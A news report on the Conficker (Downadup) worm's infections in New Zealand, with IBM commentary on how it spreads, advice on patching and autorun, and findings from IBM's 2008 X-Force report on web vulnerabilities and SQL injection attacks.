IBM is tracking the spread of the Conficker worm globally and has identified 1,156 instances of infection here in New Zealand as of January 29.
Conficker, also known as Downadup, has spread rapidly around the globe, causing havoc on corporate networks including that of the New Zealand Ministry of Health.
The worm has spread especially fiercely in South America and Asia, but according to IBM’s statistics, New Zealand also appears to have been relatively hard hit on a per capita measure.
IBM’s New Zealand security expert John Martin says the infection here has been “quite significant”.
Downadup uses computer or network resources to make copies of itself. It may also include code or other malware that damages a computer or the network. Once executed, Downadup disables some system services, including Windows Automatic Update, Windows Security Centre, Windows Defender, and Windows Error Reporting. The worm then connects to a malicious server, where it downloads additional malware to install on the infected computer.
Martin says most of the local infections appear to have been in small organisations and small businesses. He says a lot of the blame for these infections lies with users who turn automatic Windows updates off.
Martin says Conficker is now in its second phase, spreading by USB devices, network shares and cracking passwords.
Worryingly, nobody actually knows what the payload, or purpose, of Conficker is, Martin says. IBM’s X-Force security threat analysis service, however, believes it is most likely to be used as a botnet, a network of zombie computers receiving orders from a controller.
Even organisations that have applied patches can still be vulnerable to the worm through USB infection, Martin warns. He recommends systems administrators disable the autorun feature on all such memory sticks.
At the beginning of February, IBM released the results of its 2008 X-Force security trend statistics report. The report found that web application vulnerabilities have hit an all-time high. Hackers have refined the means to compromise the security of corporate websites, and are using these to launch cyber-attacks against visitors to corporate websites, the report says.
Last year more than half of all vulnerabilities disclosed were related to web applications, and of these, more than 74% had no patch. Vulnerable applications included many of the open-source content management systems used by corporations on their websites.
The report says hackers are attacking these vulnerabilities with massive waves of automated SQL injection attacks, where SQL code is “injected” via vulnerabilities into back-end databases, usually through search boxes or website forms.
The code redirects site visitors to malicious websites that download malware onto the users’ machines. The volume of SQL injection attacks at the end of 2008 was 30 times that of the previous summer, IBM says.